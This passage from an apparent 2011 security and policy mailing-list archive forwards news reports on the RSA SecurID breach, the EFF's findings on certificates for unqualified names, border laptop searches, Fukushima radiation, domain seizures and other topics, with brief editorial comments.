professional employees. The Chamber of Commerce's Global Intellectual Property Center estimates piracy and counterfeiting have stolen 2-1/2 million jobs over the years, largely due to websites which a recent report said receive over 53 billion visits a year. (Reporting by Doug Palmer; editing by Eric Beech) From rforno at infowarrior.org Tue Apr 5 06:42:46 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 5 Apr 2011 07:42:46 -0400 Subject: [Infowarrior] - Radioactivity in sea up 7.5 million times Message-ID: Tuesday, April 5, 2011 Radioactivity in sea up 7.5 million times Marine life contamination well beyond Japan feared By KANAKO TAKAHARA Staff writer http://search.japantimes.co.jp/cgi-bin/nn20110405x1.html Radioactive iodine-131 readings taken from seawater near the water intake of the Fukushima No. 1 nuclear plant's No. 2 reactor reached 7.5 million times the legal limit, Tokyo Electric Power Co. admitted Tuesday. The sample that yielded the high reading was taken Saturday, before Tepco announced Monday it would start releasing radioactive water into the sea, and experts fear the contamination may spread well beyond Japan's shores to affect seafood overseas. The unstoppable radioactive discharge into the Pacific has prompted experts to sound the alarm, as cesium, which has a much longer half-life than iodine, is expected to concentrate in the upper food chain. According to Tepco, some 300,000 becquerels per sq. centimeter of radioactive iodine-131 was detected Saturday, while the amount of cesium-134 was 2 million times the maximum amount permitted and cesium-137 was 1.3 million times the amount allowable. The amount of iodine-131 dropped to 79,000 becquerels per sq. centimeter Sunday but shot up again Monday to 200,000 becquerels, 5 million times the permissible amount. The level of radioactive iodine in the polluted water inside reactor 2's cracked storage pit had an even higher concentration. A water sample Saturday had 5.2 million becquerels of iodine per sq. centimeter, or 130 million times the maximum amount allowable, and water leaking from the crack had a reading of 5.4 million becquerels, Tepco said. "It is a considerably high amount," said Hidehiko Nishiyama, spokesman for the Nuclear and Industrial Safety Agency. Masayoshi Yamamoto, a professor of radiology at Kanazawa University, said the high level of cesium is the more worrisome find. "By the time radioactive iodine is taken in by plankton, which is eaten by smaller fish and then by bigger fish, it will be diluted by the sea and the amount will decrease because of its eight-day half-life," Yamamoto said. "But cesium is a bigger problem." The half-life of cesium-137 is 30 years, while that for cesium-134 is two years. The longer half-life means it will probably concentrate in the upper food chain. Yamamoto said such radioactive materials are likely to be detected in fish and other marine products in Japan and other nations in the short and long run, posing a serious threat to the seafood industry in other nations as well. "All of Japan's sea products will probably be labeled unsafe and other nations will blame Japan if radiation is detected in their marine products," Yamamoto said. Tepco on Monday began the release into the sea of 11,500 tons of low-level radioactive water to make room to store high-level radiation-polluted water in the No. 2 turbine building. The discharge continued Tuesday. "It is important to transfer the water in the No. 2 turbine building and store it in a place where there is no leak," Nishiyama of the NISA said. "We want to keep the contamination of the sea to a minimum." Chief Cabinet Secretary Yukio Edano apologized for the release of radioactive water into the sea but said it was unavoidable to prevent the spread of higher-level radiation. Fisheries minister Michihiko Kano said the ministry plans to increase its inspections of fish and other marine products for radiation. On Monday, 4,080 becquerels per kilogram of radioactive iodine was detected in lance fish caught off Ibaraki Prefecture. Fishermen voluntarily suspended its shipment. The health ministry plans to compile radiation criteria for banning marine products. Three days after Tepco discovered the crack in the reactor 2 storage pit it still hadn't found the source of the high radiation leak seeping into the Pacific. Tepco initially believed the leak was somewhere in the cable trench that connects the No. 2 turbine building and the pit. But after using milky white bath salt to trace the flow, which appeared to prove that was not the case, the utility began to think it may be seeping through a layer of small stones below the cable trench. Information from Kyodo added From rforno at infowarrior.org Tue Apr 5 14:13:05 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 5 Apr 2011 15:13:05 -0400 Subject: [Infowarrior] - Once Again, Court Says Homeland Security Is Free To Seize & Search Your Computer Without A Warrant At The Border Message-ID: <1B5C784A-EE99-43B3-B4F4-AF2DFB9DE9EC@infowarrior.org> Once Again, Court Says Homeland Security Is Free To Seize & Search Your Computer Without A Warrant At The Border http://www.techdirt.com/articles/20110404/16142013775/once-again-court-says-homeland-security-is-free-to-seize-search-your-computer-without-warrant-border.shtml from the bad-rulings dept We've noted, repeatedly, how troubling it is that customs seems to feel no duty to obey the 4th Amendment at the border, and that the courts have allowed this. It's even worse when it comes to searching digital devices, such as laptops. As we've explained before, what you have access to via your laptop is entirely different than what you pack in a suitcase for entering the country: ? You mostly store everything on your laptop. So, unlike a suitcase that you're bringing with you, it's the opposite. You might specifically choose what to exclude, but you don't really choose what to include. With a suitcase, you specifically choose what to include. ? The reason you bring the contents on your laptop over the border is because you're bringing your laptop over the border. If you wanted the content of your laptop to go over the border you'd just send it using the internet. There are no "border guards" on the internet itself, so content flows mostly freely across international boundaries. Thus if anyone wants to get certain content into a country via the internet, they're not doing it by entering that country through border control. And this becomes even more ridiculous in the era of cloud computing, where a drive may be mounted over the network, and thus never actually cross the border at all -- and yet, Homeland Security seems to think it has the right to search all of this, and the courts have mostly agreed. And, once again, we have yet another appeals court ruling that says this is fine even if the laptop is taken away from the customs station and brought into the country. We've had similar rulings in the past, and this one involves laptops that were taken away from the border and brought to another location, 170 miles away, where they were searched. The lower court said this evidence could not be used, but the appeals court reinstated the evidence, claiming that tossing out such evidence "would only reward those individuals who, either because of the nature of their contraband or the sophistication of their criminal enterprise, hide their contraband more cleverly or would be inclined to seek entry at more vulnerable points less equipped to discover them." But that makes no sense. I mean, if you're good at hiding your "contraband" that's already true. Nothing about this ruling changes that. All this ruling does is say that it's okay for border officials from Homeland Security to search through your stuff without reasonable suspicion. It's not about rewarding people who better hide things, it's about the basic requirement of the 4th Amendment that there be probable cause before the government can take your stuff and search it. Only the dissenting judge seemed to recognize this basic issue in the ruling, which is embedded below, noting: "I add my voice to the chorus lamenting the apparent demise of the Fourth Amendment." The majority ruling claims that it's not setting up an "anything goes" situation at the border, but it's difficult to see how it's placed any limits at all on Homeland Security. It claims that it's fine to search laptops at the border, because Homeland Security and ICE have a compelling reason to keep material out of the US that it doesn't want crossing the border. But, when it comes to digital content, that's just silly. No one is crossing the border with a laptop to "get content into the country." They can do that using the internet just fine. Claiming that searching the contents of a laptop are like searching a suitcase is as if you are technically illiterate. Of course, since this is a child porn/child abuse claim, it's easy to say that it's a "good thing" that the search caught this guy -- which it did. And I'm happy he was eventually arrested. But I'm still troubled with how the evidence was collected, and anyone who crosses the border with their computers should be equally concerned. Don't let the fact that this case was about child pornography detract from the important issues about your own privacy rights concerning information stored on a laptop. From rforno at infowarrior.org Tue Apr 5 15:10:03 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 5 Apr 2011 16:10:03 -0400 Subject: [Infowarrior] - RSA Blames Phishing Attack for March Security Breach Message-ID: <4DD20614-EEEA-4745-AC20-BBCD1AA374BE@infowarrior.org> (c/o KM) RSA Blames Phishing Attack for March Security Breach ARTICLE DATE: 04.05.11 By Chloe Albanesius http://www.pcmag.com/print_article2/0,1217,a=262703,00.asp?hidPrint=true RSA, the security division of EMC, blamed a phishing attack for a recent breach that threatened its SecurID authentication service. Specifically, a hacker sent two different phishing emails over a two-day period to a small group of RSA employees. The subject line of the emails was "2011 Recruitment Plan" and it included an Excel spreadsheet with the same name. "The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file," Uri Rivner, head of new technologies, identity protection and verification at RSA, wrote in a Friday blog post. That spreadsheet, however, contained a zero-day exploit that installed a backdoor through an Adobe Flash vulnerability, Rivner said. Adobe has since released a patch for the bug. Last month, RSA sent a letter to customers that warned them of "an extremely sophisticated cyber attack in progress being mounted against RSA." Executive chairman Art Coviello said at the time that the attack was an Advanced Persistent Threat (APT) that resulted in the hackers extracting "certain information" from RSA's systems. Coviello said the attack did not allow for a direct attack on RSA's SecurID system, but it might be used to "reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack," he said. In his blog post, Rivner said "in our case the weapon of choice was a Poison Ivy variant set in a reverse-connect mode that makes it more difficult to detect, as the PC reaches out to the command and control rather than the other way around. Similar techniques were reported in many past APTs, including GhostNet." Rivner said the focus of an APT is to "use a totally new approach for entering the organization." "You don't bother to just simply hack the organization and its infrastructure; you focus much more of your attention on hacking the employees," he wrote. Rivner then touted the company's detection technology, arguing that "a lot of companies either detected the attacks after months, or didn't detect them at all and learned about it from the government." Copyright (c) 2011 Ziff Davis Inc. All Rights Reserved. From rforno at infowarrior.org Tue Apr 5 20:09:31 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 5 Apr 2011 21:09:31 -0400 Subject: [Infowarrior] - Patent dispute threatens US Alzheimer's research Message-ID: <557B601B-C965-4699-9D3E-924940987088@infowarrior.org> (c/o RSK) Published online 5 April 2011 | Nature | doi:10.1038/472020a http://www.nature.com/news/2011/110405/full/472020a.html Patent dispute threatens US Alzheimer's research Lawsuit could expose hundreds of scientists to property-rights litigation. Erika Check Hayden The website of the Alzheimer's Institute of America (AIA) doesn't reveal much about the organization, but portrays it as committed to supporting research and patients. Among people who study Alzheimer's disease, however, the AIA, based in St Louis, Missouri, is best known for filing lawsuits against companies and researchers ? a practice that scientists say could hamper the progress of research into combating the dreaded disease. An AIA lawsuit filed in February 2010 against the Jackson Laboratory in Bar Harbor, Maine ? a source of laboratory mice funded by the US National Institutes of Health (NIH) ? now threatens hundreds of government-sponsored Alzheimer's researchers with litigation. The lab is so concerned about the financial and scientific costs of defending itself that it has asked the NIH to assume the defence of the case. "The lawsuits raised by the AIA are unfortunate, and constitute a large drain on valuable scientific resources at a time when scientific funds are increasingly tight," says Benjamin Wolozin, an Alzheimer's researcher at Boston University in Massachusetts. The suit concerns an AIA patent on a human DNA sequence used in mouse models of Alzheimer's disease. The sequence encodes the 'Swedish mutation' (discovered in a Swedish family), which causes early-onset Alzheimer's. Michael Mullan, a biomedical researcher who is now head of the Roskamp Institute in Sarasota, Florida, patented the sequence in 1995, then sold it to the AIA. The NIH requires scientists to share transgenic mouse strains developed using NIH money, and the agency funds Jackson to breed, house and distribute these mouse models, says David Einhorn, house counsel at the lab. The AIA is alleging that Jackson infringed on its Swedish mutation patent, and others, when the lab distributed 22 strains of mice with the mutation to researchers; the organization is seeking unspecified damages. The lawsuit also accuses six commercial companies of improperly profiting from the Swedish mutation, for instance by using mice bearing the mutation to test potential drugs. Furthermore, the AIA has filed four separate suits relating to the patent against academic institutions and companies in Oklahoma, Florida, Missouri and Pennsylvania (see 'Patent disputes'). But the litigation against Jackson could have the broadest impact on research. According to Einhorn, the AIA is demanding that Jackson hands over the names of all scientists who have worked with the relevant mouse models; this raises the possibility that those individual researchers might also be sued. Last month, judge Elizabeth Laporte for the US District Court of Northern California recognized the potential impact of the suit on Alzheimer's research. She denied an AIA request to expand the suit by adding another patent-infringement claim, writing in her decision that the AIA has not disputed Jackson's claim that "prolonging the litigation in this case would harm Jackson and the public by extending the chilling effect of the litigation on mice research on Alzheimer's disease". The AIA says that it allows academic research on mouse models covered by its patents, but does not permit work that profits from them. "Jackson Laboratory is not giving away the mice for academic research. On the contrary, these mice are being sold, and Jackson Laboratory is making quite a lot of money in the process. Furthermore, the mice Jackson sells are, in many instances, being used for commercial, not academic, purposes," the institute wrote in a statement. Einhorn counters that the lab doesn't make enough from distributing mouse models to cover its operating costs, and it relies on philanthropy and public and private grants to support its work. He says that Jackson only allows academics, not companies, to use the models, and points out that asserting rights in such cases runs counter to common practice, which is established by NIH policy. Defending against the lawsuit puts Jackson in a difficult spot. Proving that the AIA's allegations are groundless could take years and millions of dollars. It could also cast a pall over the Alzheimer's-research field, which has already been scarred by an extensive fight over the Swedish mutation patents during the 1990s (see Nature 404, 319?320; 2000). But settling out of court would require Jackson to hand over researchers' names, a demand that Einhorn calls "repugnant". "We haven't been able to settle this case because we're trying to do the right thing by trying to support the NIH policy and protect researchers out there in the community," says Einhorn. Kathy Hudson, NIH deputy director for science, outreach and policy, says that the agency is considering the lab's request for help, made last December. "We're trying to evaluate the legal risks and the risks to the research community," she says. From rforno at infowarrior.org Wed Apr 6 08:07:26 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 09:07:26 -0400 Subject: [Infowarrior] - OT: How the Senate was bait and switched into war Message-ID: <5324C1DA-5C24-4FE5-842C-D63331835BA0@infowarrior.org> (For years I've hated the idea of including "....and for other purposes" in the titles of legislation, as it gives Congresscritters awesome wiggleroom (which they like) -- but more sinister is a practice described here, where a combination of individual assumptions and late-night legislative routines serve to quickly rush through legislation w/far-reaching ramifications. --- rick) BELTWAY CONFIDENTIAL How the Senate was bait and switched into war By: Conn Carroll 04/04/11 3:26 PM Associate Editor Of Commentary http://washingtonexaminer.com/blogs/beltway-confidential/2011/04/how-senate-was-bait-and-switched-war Last week, minutes after President Barack Obama explained to the nation why he took the country to war, Sen. Rand Paul (R-Ky.) posted a statement on YouTube first noting Obama?s 2007 claim that ?The President does not have power under the Constitution to unilaterally authorize a military attack in a situation that does not involve stopping an actual or imminent threat to the nation? and then adding: ?Unfortunately, President Obama has failed to heed his own advice. He has ignored our constitution and engaged us in a military conflict without congressional debate and approval.? But the day before on This Week, Secretary of State Hillary Clinton told ABC News? Jake Tapper: ?The United States Senate called for a no-fly zone in the resolution that it passed on March 1st.? So who is right? Did the president go to war without any approval from the Senate, as Sen. Paul says? Or did the Senate approve the president?s use of military force, as Secretary Clinton claims? The answer involves a secretive Senate procedure known as ?hotlining.? Hotlining is a system that allows legislation to pass by ?unanimous consent,? usually in the evening, when almost no Senators are present. Prior to a bill?s consideration, the Democrat and Republican Cloakrooms send out hotline notices ? automated phone calls and emails ? to key staff. The hotline notices typically include the bill number, so members can look it up and review its contents. However, in the case of the Libya, the resolution was not made public until the day after the Senate approved it. According to numerous congressional aides, almost no members knew about the no-fly zone language. Most offices thought they were approving a different resolution ? with the same sponsor and a nearly identical title ? that had been circulating among congressional offices for two weeks. In a February 22, email obtained by the Examiner, an aide to Sen. Robert Menendez (D-N.J.) sent a resolution to the staff of members of the Senate Foreign Relations Committee condemning human rights abuses in Libya. There was no mention of a no-fly zone. On March 1st, at 4:03pm, a different resolution was ?hotlined.? The only information provided in the hotline email was the title: ?S. Res. __ A resolution strongly condemning the gross and systematic violations of human rights in Libya, including violent attacks on protesters demanding democratic reforms, and for other purposes.? But what Senate offices did not know was that the sponsors had secretly slipped into the resolution the following sentence: ?[the Senate] urges the United Nations Security Council to take such further action as may be necessary to protect civilians in Libya from attack, including the possible imposition of a no-fly zone over Libyan territory? Most staff assumed the ?hotline? referred to the previous draft, and had no reason to place a "hold" on a resolution condemning Libya Human Rights abuses. At 6:30 pm, Sen. Chuck Schumer (D-NY) took to a near empty chamber, and introduced the brand new resolution and asked that it be approved without debate or vote. By 6:31, the resolution was passed. The resolution is non-binding and has no force of law, but that did not stop pro-war Senators from rushing out to claim that the Senate had just approved military action: ?There is a bipartisan consensus building to provide assistance to liberated areas of Libya and to work with our allies to enforce a no-fly zone," a Sen. Mark Kirk (R-Ill.) statement released that night read. Senators more skeptical of military action where the United States has no national interest felt deceived. Sen. Mike Lee (R-Utah) tells The Examiner: "Clearly, the process was abused. You don't use a hotline to bait and switch the country into a military conflict. There is no more difficult decision than whether to put our men and women in uniform in harm's way. With no imminent threat to the national security of the United States, the President should have asked for authorization and Congress should have had a thorough debate.? Sen. Paul is not giving up without a fight. Last Wednesday he introduced an amendment to a small business bill that would adopt then-candidate Obama?s 2007 statement above as ?the sense of the Senate.? Majority Leader Harry Reid (D-Nev.) shut down the entire Senate to avoid debating the issue. But Sen. Paul?s motion is till the pending business of the Senate. With Senate action needed to avid a government shutdown next week, Paul, and the American people, may just yet get a debate on military action in Libya. From rforno at infowarrior.org Wed Apr 6 08:15:25 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 09:15:25 -0400 Subject: [Infowarrior] - RSA requiring customer NDA to detail SecurID hack Message-ID: <60F57241-10F2-450A-B04F-99D22B44E4A1@infowarrior.org> (To which, I call "shenanigans"--- and commend Gula et.al for speaking out against this demand. This sort of industry idiocy is, in my view, unconscionable for a variety of reasons, and once again ignites the issue of what should constitute proper cybersecurity disclosure practices not for any one party, but for the Internet community as a whole. For shame, RSA. In other news, how long before this 'proprietary' information becomes public? --- rick) RSA detailing SecurID hack to customers sworn to secrecy Some customers hesitant to sign nondisclosure agreements By Ellen Messmer, Network World April 05, 2011 05:45 PM ET http://www.networkworld.com/cgi-bin/mailto/x.cgi?pagetosend=/news/2011/040511-rsa-hack-nda.html RSA has started providing more detail into the mid-March attack on its SecurID token-based authentication system, but to get a fuller story you have to be an RSA customer willing to sign a nondisclosure agreement (NDA). An NDA means that you agree to keep secret what RSA would be willing to tell you. Sources say RSA is reaching out to its largest customers, especially those in sensitive industries, to get IT executives to sign such NDAs. However, some RSA customers say they aren't willing to do that. "RSA was asking that I sign an NDA," says Ron Gula, CEO at Tenable Network Security, which uses SecurID tokens for authentication. "I'm suspicious. Why hide it?" Gula said he doesn't want to feel his hands are tied by agreeing to an NDA, though he hopes in the end it's "all a non-issue" about something that RSA will speak about soon anyway. But it's making him uneasy and he's looking at using other authentication products. Jon Oltsik, senior principal analyst at Enterprise Strategy Group, says he did sign an NDA. "Let me put it this way, I learned a little more," he says, adding that as an analyst, he doesn't know whether he heard the same discussion RSA is sharing with its customers. He notes RSA is starting to discuss the topic of the break-in more. "We're in uncharted waters. They're trying to be cautious." "I didn't want to sign an NDA. I think I need to be independent," says Bill Nelson, president of the Financial Services - Information Sharing and Analysis Center (FS-ISAC), the industry forum for collaboration against critical security threats, which interacts with government agencies such as Department of Homeland Security. IT-ISAC uses SecurID, and there's nothing known publicly related to the RSA data breach and SecurID so far to alter the decision to use it, Nelson says. RSA itself says it has "executed a massive outreach program" that has reached more than 60,000 customers with its security notes about the painful topic, and there have been discussions with more than 15,000 customers by phone, more than 5,000 customers via conference calls and "hundreds of face-to-face meetings." RSA declines to say how many customers have been offered or declined an NDA briefing. Nelson said he decided to decline to sign an NDA to get yet more information that would be secret. He notes many IT-ISAC members, however, some of whom were angry at first, have signed an NDA, and are now sworn to secrecy. Nelson says he doesn't know what's in the NDA briefing from RSA. But much of the discussion from RSA in the wake of the March breach disclosure has been about best-practices deployments of the RSA SecurID token system. Tales have been told over the years about poor implementation of SecurID, where lax security practices were followed, Nelson notes. "They're addressing poor implementations of their products," he says. Sources close to RSA say not all RSA SecurID customers are being approached to sign an NDA, which means they would not be offered privileged information. Under the NDA, RSA is sharing far more detail regarding a "worst-case scenario" about how the RSA SecurID token system can be undermined by an attack, and offering more clarity about remediation. There's cause to believe RSA is itself remediating SecurID, with a source close to RSA saying the security issues brought to the fore should not impact future RSA SecurID customers. RSA is starting to speak a bit more about what happened during the break-in. For one thing, RSA employees were tricked by a targeted phishing attack using a spreadsheet containing an Adobe Flash zero-day vulnerability (CVE-2011-0609), said Uri Rivner, head of new technology for identity protection and verification, in a recent RSA blog post. The subject-line lure, he says, was "2011 recruitment plan.xls," which was apparently so enticing, one RSA employee even retrieved it from a spam filter, where it had been caught. Clicking on it allowed the attacker to take over the machine. "They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high-value targets, which included process experts and IT and non-IT specific server administrators," Rivner writes. The attacker set up staging servers as "key aggregation points" and "then they went into servers of interest, removed data and moved it to internal staging servers where the data was aggregated, compressed and encrypted for extraction," according to Rivner's RSA blog."The attacker then used FTP to transfer many password-protected RAR files from the RSA file server to an outside staging area at an external, compromised machine at a hosting provider." The attacker stole away with the files from there. The Adobe zero-day vulnerability, now patched by Adobe, allowed the attacker to control the victim's machine at RSA and use a variant of a long-known hacker tool called Poison Ivy to set up a command-and-control system aimed at extricating data. Sam Curry, chief technology officer, marketing, at RSA, says the NetWitness NextGen security-monitoring product, which RSA has used for three years, was instrumental in detecting the attack in progress. "It helped us to identity it," he says. Coincidentally, RSA has been in discussions to acquire the company NetWitness, which it did on April 1 and announced just this week. From rforno at infowarrior.org Wed Apr 6 12:44:16 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 13:44:16 -0400 Subject: [Infowarrior] - Unqualified Names in the SSL Observatory Message-ID: <2C4F8D2A-43F8-415E-B68C-6572D3AEB8FF@infowarrior.org> (a colleague and I wrote about this problem nearly 10 years ago ... funny how what's old becomes new again .... or what's bad becomes horrific...... --- rick) April 5th, 2011 Unqualified Names in the SSL Observatory Technical Analysis by Chris Palmer https://www.eff.org/deeplinks/2011/04/unqualified-names-ssl-observatory Internet certification authorities (CAs) are charged with the task of vouching for the identities of secure web servers. When you browse to https://www.wellsfargo.com/, your browser knows it?s the real wellsfargo.com because VeriSign, a CA, says it is. However, if CAs don?t validate the identities of the sites they vouch for, the whole system breaks down. In this post, I?ll discuss one way in which CAs frequently fail. Using data in EFF's SSL Observatory, we have been able to quantify the extent to which CAs engage in the insecure practice of signing certificates for unqualified names. That they do so in large numbers indicates that they do not even minimally validate the certificates they sign. This significantly undermines CAs? claim to be trustworthy authorities for internet names. It also puts internet users at increased risk of network attack. Normally, a public CA like Verisign or Comodo should sign only public names. On the internet, only fully-qualified domain names are public and routable. For example, ?www.eff.org.? is a fully-qualified name. By contrast, the name ?www? is unqualified or not fully-qualified. This name is not globally unique, and may refer to a different computer on my network than it does on your network. (On some networks, it may not refer to any computer at all.) As a convenience for users, the administrators of local networks will often configure their networks to use unqualified names for internal services. This is why, at many companies, you can simply type ?mail? or ?wiki? or ?intranet? into your browser, and get to your company?s internal web resources. But these names have ? or should have ? no meaning on the global internet. In the Observatory we have discovered many examples of CA-signed certificates unqualified domain names. In fact, the most common unqualified name is ?localhost?, which always refers to your own computer! It simply makes no sense for a public CA to sign a certificate for this private name. Some CAs have signed many, many certificates for this name, which indicates that they do not even keep track of which names they have signed. Some other CAs do make sure to sign ?localhost? only once. Cold comfort! Although signing ?localhost? is humorous, CAs create real risk when they sign other unqualified names. What if an attacker were able to receive a CA-signed certificate for names like ?mail? or ?webmail?? Such an attacker would be able to perfectly forge the identity of your organization?s webmail server in a ?man-in-the-middle? attack! Everything would look normal: your browser would use HTTPS, it would show a the lock icon that indicates HTTPS is working properly, it would show that a real CA validated the HTTPS certificate, and it would raise no security warnings. And yet, you would be giving your password and your email contents to the attacker. To test the prevalence of the validated, unqualified names problem, I queried the Observatory database for unqualified names similar to ?exchange?. (Microsoft Exchange is an extremely popular email server, and servers that run it commonly have ?exchange? or ?exch? in their names. Likely examples include ?exchange.example.net? and ?exch-01.example.com?.) My results show that unqualified ?exchange?-like names are the most popular type of name, overall, that CAs are happy to sign. Unqualified Name Pattern Valid Certificates Observed ?localhost? 2,201 ?exchange? 806 ?exchange? with characters on either side, e.g. ?exchange01? or ?aexchange3? 2,383 ?exch? with characters on either side, e.g. ?exch01? or ?01srvexch? 5,657 All unqualified names 37,244 Related Work George Macon at Georgia Tech has also used the Observatory to investigate the unqualified names problem. For example, he isolated the CAs that sign unqualified names, and counted how many times each one did so. (GoDaddy is by far the worst offender.) He also identified some extended-validation certificates that are issued to unqualified names. In January 2011, when he ran his analysis, ten of the twenty-eight unqualified EV certificates were still valid. Impact It is far too easy for an attacker to perform a very convincing MITM attack against private exchange servers. The bad behavior of CAs helps attackers. Recommendations Users should avoid using unqualified names to access internal resources. Instead, create a bookmark to the URL with the fully-qualified name, e.g. ?https://mail.example.com/?. Users should also alert their network administrators to the problem. Browsers (and other TLS clients, like email readers and web service applications) should stop treating certificates for unqualified names and for IP addresses as valid. Organizations relying on certificates for unqualified names should use their own private CA for their private namespace. For example, all those Exchange shops can use Microsoft's CA software. Certifcate authorities should stop signing unqualified names, and should revoke existing certificates for unqualified names. They should also stop signing IP addresses ? especially private, non-routable addresses ? and should revoke existing IP address certificates, too. From rforno at infowarrior.org Wed Apr 6 17:29:59 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 18:29:59 -0400 Subject: [Infowarrior] - Woman single-handedly cuts off two countries from Internet Message-ID: <6FC1824A-B597-4131-861B-F0319AE4038B@infowarrior.org> You can't make this stuff up!! --- rick http://digitallife.today.com/_news/2011/04/06/6419851-woman-single-handedly-cuts-off-two-countries-from-internet http://www.timeslive.co.za/local/article1006491.ece/75-year-old-killed-Georgia-Armenia-internet Woman single-handedly cuts off two countries from Internet By Rosa Golijan A 75-year-old woman recently managed to cut off two countries ? Georgia and Armenia ? from the Internet by accident. We don't even dare contemplate what she is capable of doing intentionally. The AFP reports that the woman was digging for scrap metal when she came across a fiber optic cable "which runs through Georgia to Armenia." According to Georgian interior ministry spokesman Zura Gvenetadze, the woman then proceeded to cut into the cable with intentions of stealing it. Based on the AFP's report, it doesn't sound like the woman was attempting to take down anyone's Internet, but she did so anyway and thousands of people in both Georgia and Armenia were forced offline for hours. As a result, the elderly woman may be facing legal consequences: The woman who was arrested in the village of Ksani has been charged with damaging property and could face up to three years in prison if convicted. "Taking into account her advancing years, she has been released pending the end of the investigation and subsequent trial," Gvenetadze said. It is worth noting that this isn't the first time that Georgia residents temporarily lost Internet connectivity because of a scrap metal scavenger ? a very similar event occurred in 2009. From rforno at infowarrior.org Wed Apr 6 21:15:12 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 22:15:12 -0400 Subject: [Infowarrior] - Justice Department opposes digital privacy reforms Message-ID: <5BF7E57F-FDAA-453F-A215-1DDB075A8C64@infowarrior.org> April 6, 2011 3:39 PM PDT Justice Department opposes digital privacy reforms by Declan McCullagh The U.S. Justice Department today offered what amounts to a frontal attack on proposals to amend federal law to better protect Americans' privacy. James Baker, the associate deputy attorney general, warned that rewriting a 1986 privacy law to grant cloud computing users more privacy protections and to require court approval before tracking Americans' cell phones would hinder police investigations. This appears the first time that the Justice Department has publicly responded to a set of digital privacy proposals unveiled last year by a coalition of businesses and advocacy groups including AT&T, Google, Microsoft, eBay, the American Civil Liberties Union, and Americans for Tax Reform. < -- > http://news.cnet.com/8301-31921_3-20051461-281.html From rforno at infowarrior.org Wed Apr 6 21:27:55 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 6 Apr 2011 22:27:55 -0400 Subject: [Infowarrior] - "Extend and Pretend": The Severe Ramifications of Wall Street's Game Message-ID: <0A31E516-0C63-40E7-8C17-23B4647F6546@infowarrior.org> "Extend and Pretend": The Severe Ramifications of Wall Street's Game http://www.minyanville.com/businessmarkets/articles/extend-and-pretent-recovery-commericial-lending/3/31/2011/id/33692?page=full From rforno at infowarrior.org Thu Apr 7 07:04:42 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 7 Apr 2011 08:04:42 -0400 Subject: [Infowarrior] - =?windows-1252?q?=93Operation_In_Our_Sites=94_Wil?= =?windows-1252?q?l_Continue_Seizing_Domains?= Message-ID: (Translation: ICE is happy playing Whack-a-Mole and thinking it's an effective tactic. -- rick) ?Operation In Our Sites? Will Continue Seizing Domains ? Ernesto ? 7/04/2011 http://torrentfreak.com/operation-in-our-sites-will-continue-seizing-domains-11040 ICE director John Morton has confirmed that the seizure of domain names that are alleged to be promoting copyright infringement will continue in the coming years. In a statement before the U.S. House of Representatives, Morton said that ?Operation In Our Sites? will continue through and beyond 2011. In addition and contrary to popular belief, Morton claimed that the seizures ?respect free speech? and ?provide due process.? The US Government is currently considering new legislation to tackle online piracy. As part of this ongoing effort the House of Representatives organized a hearing titled ?Promoting Investment and Protecting Commerce Online: Legitimate Sites v. Parasites, Part II.? Described by some people as ?a parade of strawmen? the hearing focused heavily on Google, and how the search engine should be the one to ensure that online piracy no longer poses a problem. However, a speaker that also delivered some interesting statements was ICE director John Morton, who has been leading the seizures of piracy-related domain names in the past several months. In his witness testimony Morton explained in detail how more than 100 domains were seized in four separate rounds, starting in June of last year. While omitting to mention that many of the sites simply continued under different domains, Morton said that the seizure banners have led to ?public education about pirating? as they had received 38 million hits since the start of the operation. Another statement of interest from the ICE director is that Operation In Our Sites is here for the long haul. Despite the critique from journalists, activists and politicians, the US Government will continue to seize domains in the future. ?The Operation In Our Sites initiative will continue through 2011 and beyond. ICE?s efforts through this operation successfully disrupt the ability of criminals to purvey copyrighted materials illegally over the internet,? Morton testified. ?In addition to the domain names that are seized through this operation, evidence suggests that the operation has a deterrent effect. In fact, following Operations In Our Sites v. 1.0, ICE was notified that 81 of the most active websites that had been offering pirated material voluntarily shut down,? the ICE director added. The rest of Morton?s statement appears to be an effort to justify the domain seizure procedures, directly responding to the many constitutional questions that were posed, in particular the claimed absence of due process. ?Operation In Our Sites was developed with the Department of Justice to respect free speech, to provide due process, and to work within the statutory framework provided to us by Congress. Domain names seized under Operation In Our Sites are seized only in furtherance on ongoing criminal investigations into violations of U.S. federal laws.? Although ICE?s definition of due process appears to differ from that preferred by their critics, Morton gave four examples of how domain owners can attempt to get them back after a seizure. However, in reality this turns out to be more problematic than ICE claims it is. The owner of Torrent-Finder, one of the seized domains, told TorrentFreak that his options are rather limited since he can not rely on ?constitutional rights? as an Egyptian. He appealed the seizure from the very start, in November of last year, but thus far the case is moving very slowly. Overall, ICE believes that the current way of dealing with domains that are possibly connected to copyright infringement is the best option they have. Morton said that based on ?tips from industry representatives? among others, they will continue to seize domains that are deemed to support online piracy. From rforno at infowarrior.org Thu Apr 7 13:57:39 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 7 Apr 2011 14:57:39 -0400 Subject: [Infowarrior] - Old law in the modern day.... Message-ID: <904DE2F3-D0D3-410B-ABE8-95FDE7ACEF84@infowarrior.org> (More on the Anti-Deficiency Law behind this e-panic: http://www.telegraph.co.uk/news/worldnews/us-politics/8434413/US-government-shutdown-the-law-behind-the-problem.html) Federal Workers Brace for Email Withdrawal By JANET ADAMY http://online.wsj.com/article/SB10001424052748704013604576247192518889036.html Federal employees are already fretting about a side effect of a possible government shutdown: surrendering their work-issued BlackBerry devices. An administration official said Wednesday that if the government can't avert a shutdown by the weekend, non-essential workers would be asked to report to work Monday and turn over their BlackBerrys, laptop computers and other devices that allow them to access the office computer systems. Then the employees would be sent back home. "If an employee is furloughed, it is illegal?a criminal violation?for them to work," the official said. In 